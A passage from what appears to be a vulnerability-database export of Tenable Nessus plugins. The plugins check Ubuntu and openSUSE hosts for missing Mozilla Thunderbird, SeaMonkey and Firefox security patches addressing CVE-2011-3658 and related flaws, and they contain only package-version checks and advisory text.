script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xul-ext-mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xul-ext-ubufox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"xul-ext-mozvoikko\", pkgver:\"1.10.0-0ubuntu0.11.04.4\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"xul-ext-ubufox\", pkgver:\"0.9.3-0ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"xul-ext-mozvoikko\", pkgver:\"1.10.0-0ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"xul-ext-ubufox\", pkgver:\"1.0.2-0ubuntu0.11.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xul-ext-mozvoikko / xul-ext-ubufox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:37:19", "description": "Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Thunderbird\nor execute arbitrary code as the user that invoked Thunderbird.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library\nthat could be triggered by JavaScript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could\nresult in an out-of-bounds memory access if SVG elements were removed\nduring a DOMAttrModified event handler. An attacker could potentially\nexploit this vulnerability to crash Thunderbird. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation\naccessKey events to detect key strokes even when JavaScript was\ndisabled. A malicious web page could potentially exploit this to trick\na user into interacting with a prompt thinking it came from\nThunderbird in a context where the user believed scripting was\ndisabled. (CVE-2011-3663)\n\nIt was discovered that it was possible to crash Thunderbird when\nscaling an OGG <video> element to extreme sizes. (CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2012-01-25T00:00:00", "title": "Ubuntu 11.10 : thunderbird vulnerabilities (USN-1343-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:thunderbird"], "id": "UBUNTU_USN-1343-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57686", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1343-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57686);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_bugtraq_id(51133, 51134, 51135, 51136, 51138);\n script_xref(name:\"USN\", value:\"1343-1\");\n\n script_name(english:\"Ubuntu 11.10 : thunderbird vulnerabilities (USN-1343-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Thunderbird\nor execute arbitrary code as the user that invoked Thunderbird.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library\nthat could be triggered by JavaScript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could\nresult in an out-of-bounds memory access if SVG elements were removed\nduring a DOMAttrModified event handler. An attacker could potentially\nexploit this vulnerability to crash Thunderbird. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation\naccessKey events to detect key strokes even when JavaScript was\ndisabled. A malicious web page could potentially exploit this to trick\na user into interacting with a prompt thinking it came from\nThunderbird in a context where the user believed scripting was\ndisabled. (CVE-2011-3663)\n\nIt was discovered that it was possible to crash Thunderbird when\nscaling an OGG <video> element to extreme sizes. (CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1343-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"thunderbird\", pkgver:\"9.0+build2-0ubuntu0.11.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:56:50", "description": "seamonkey version 2.6 fixes several security issues :\n\ndbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\ndbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-54/CVE-2011-3661: Potentially exploitable crash in the YARR\nregular expression library dbg114-seamonkey-5574 new_updateinfo\nseamonkey-5574 MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\naccess dbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-56/CVE-2011-3663: Key detection without JavaScript via SVG\nanimation dbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-58/CVE-2011-3665: Crash scaling <video> to extreme sizes", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : seamonkey (openSUSE-SU-2012:0007-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:seamonkey-debugsource", "p-cpe:/a:novell:opensuse:seamonkey-debuginfo", "p-cpe:/a:novell:opensuse:seamonkey-dom-inspector", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:seamonkey-translations-other", "p-cpe:/a:novell:opensuse:seamonkey-venkman", "p-cpe:/a:novell:opensuse:seamonkey-translations-common", "p-cpe:/a:novell:opensuse:seamonkey-irc", "p-cpe:/a:novell:opensuse:seamonkey"], "id": "SUSE_11_4_SEAMONKEY-111221.NASL", "href": "https://www.tenable.com/plugins/nessus/76025", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update seamonkey-5574.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76025);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:42\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n\n script_name(english:\"openSUSE Security Update : seamonkey (openSUSE-SU-2012:0007-1)\");\n script_summary(english:\"Check for the seamonkey-5574 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"seamonkey version 2.6 fixes several security issues :\n\ndbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\ndbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-54/CVE-2011-3661: Potentially exploitable crash in the YARR\nregular expression library dbg114-seamonkey-5574 new_updateinfo\nseamonkey-5574 MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\naccess dbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-56/CVE-2011-3663: Key detection without JavaScript via SVG\nanimation dbg114-seamonkey-5574 new_updateinfo seamonkey-5574 MFSA\n2011-58/CVE-2011-3665: Crash scaling <video> to extreme sizes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=737533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-irc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-venkman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-debuginfo-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-debugsource-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-dom-inspector-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-irc-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-translations-common-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-translations-other-2.6-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"seamonkey-venkman-2.6-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey / seamonkey-dom-inspector / seamonkey-irc / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:56:03", "description": "Mozilla Firefox Version 9 fixes several security issues :\n\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-54/CVE-2011-3661: Potentially exploitable crash in the YARR\nregular expression library dbg114-MozillaFirefox-5577\nMozillaFirefox-5577 new_updateinfo MFSA 2011-55/CVE-2011-3658:\nnsSVGValue out-of-bounds access dbg114-MozillaFirefox-5577\nMozillaFirefox-5577 new_updateinfo MFSA 2011-56/CVE-2011-3663: Key\ndetection without JavaScript via SVG animation\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-58/CVE-2011-3665: Crash scaling <video> to extreme sizes", "edition": 26, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (openSUSE-SU-2012:0039-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-js192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-js192-32bit"], "id": "SUSE_11_4_MOZILLAFIREFOX-111221.NASL", "href": "https://www.tenable.com/plugins/nessus/75950", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-5577.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75950);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:41\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (openSUSE-SU-2012:0039-2)\");\n script_summary(english:\"Check for the MozillaFirefox-5577 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox Version 9 fixes several security issues :\n\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-54/CVE-2011-3661: Potentially exploitable crash in the YARR\nregular expression library dbg114-MozillaFirefox-5577\nMozillaFirefox-5577 new_updateinfo MFSA 2011-55/CVE-2011-3658:\nnsSVGValue out-of-bounds access dbg114-MozillaFirefox-5577\nMozillaFirefox-5577 new_updateinfo MFSA 2011-56/CVE-2011-3663: Key\ndetection without JavaScript via SVG animation\ndbg114-MozillaFirefox-5577 MozillaFirefox-5577 new_updateinfo MFSA\n2011-58/CVE-2011-3665: Crash scaling <video> to extreme sizes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=737533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 